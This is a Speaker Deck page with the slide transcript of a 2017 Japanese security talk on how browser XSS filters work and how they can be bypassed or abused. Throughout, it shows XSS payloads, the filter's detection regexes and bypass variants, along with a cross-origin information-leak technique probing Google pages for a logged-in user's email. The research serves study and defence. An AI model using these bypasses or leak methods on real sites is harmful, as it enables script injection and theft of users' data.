Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
Search
Masato Kinugawa
March 31, 2017
Technology
7
3.3k
XSSフィルターの使い方/ Shibuya.XSS techtalk #9
2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。
Masato Kinugawa
March 31, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
masatokinugawa
0
510
Shadow DOM & Security - Exploring the boundary between light and shadow
masatokinugawa
1
1.6k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
860
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
4k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.5k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
20k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
22k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
20
7k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
100k
Other Decks in Technology
See All in Technology
pprof vs runtime/trace (FlightRecorder)
task4233
0
170
定期的な価値提供だけじゃない、スクラムが導くチームの共創化 / 20251004 Naoki Takahashi
shift_evolve
PRO
3
300
OpenAI gpt-oss ファインチューニング入門
kmotohas
2
960
許しとアジャイル
jnuank
1
120
E2Eテスト設計_自動化のリアル___Playwrightでの実践とMCPの試み__AIによるテスト観点作成_.pdf
findy_eventslides
0
120
多野優介
tanoyusuke
1
430
ユニットテストに対する考え方の変遷 / Everyone should watch his live coding
mdstoy
0
130
AI ReadyなData PlatformとしてのAutonomous Databaseアップデート
oracle4engineer
PRO
0
180
いま注目しているデータエンジニアリングの論点
ikkimiyazaki
0
590
フルカイテン株式会社 エンジニア向け採用資料
fullkaiten
0
9k
データエンジニアがこの先生きのこるには...?
10xinc
0
440
VCC 2025 Write-up
bata_24
0
180
Featured
See All Featured
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
Rails Girls Zürich Keynote
gr2m
95
14k
Why Our Code Smells
bkeepers
PRO
339
57k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.2k
Docker and Python
trallard
46
3.6k
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
tammyeverts
9
580
GraphQLとの向き合い方2022年版
quramy
49
14k
Done Done
chrislema
185
16k
Typedesign – Prime Four
hannesfritz
42
2.8k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
9
960
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
3.1k
What's in a price? How to price your products and services
michaelherold
246
12k
Transcript
None
None
❶ ➌ ❷ ❹
None
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>
https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>
https://addons.mozilla.org/ja/firefox/addon/noscript/
HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
None
None
None
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">
None
<input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
<input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->
https://example.com/?q="><svg+onload=alert(1)>
https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701
<title><script> - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>
<script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }
</script> https://example.com/?<script src=//example.jp/jquery.js></script>
None
{<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>
"><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"
None
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622
https://www.slideshare.net/masatokinugawa/xxn-ja
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:
?q=";document.body.innerHTML="<xss>
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>
URL: ?"/++.+++=
"style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:
<script src="//example^co.jp/test.js" type="text/javascript"> </script>
window#name//Syntax Error window^name//Syntax OK <script> window.name
None
url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }
https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from
an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else
https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>
https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
None
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //
// }else{ // } <script>…</script>
https://www.youtube.com/watch?v=IMDWjKFbsJE
HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:
SAMEORIGIN
https://accounts.google.com/ServiceLogin?
google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br
google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(
✨ ✨ ✨
{<a.*?hr{e}f}
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/
0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>
5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref
0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>
5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_
A a 0x00 0-9 < B-Z b-z
<div class="gb_xb">
[email protected]
</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}
✔ ✔ ✔ ✔
<div class="gb_xb">
[email protected]
</div><div class="gb_pb">
https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
= https://www.google.co.jp/?"
[email protected]
=
https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.de/?"
[email protected]
= https://www.google.ru/?"
[email protected]
=
https://www.google.ru/?"
[email protected]
=
https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ru/?"
[email protected]
= https://www.google.ca/?"
[email protected]
= ...
✨ ✨ ✨
None
None
None
None
None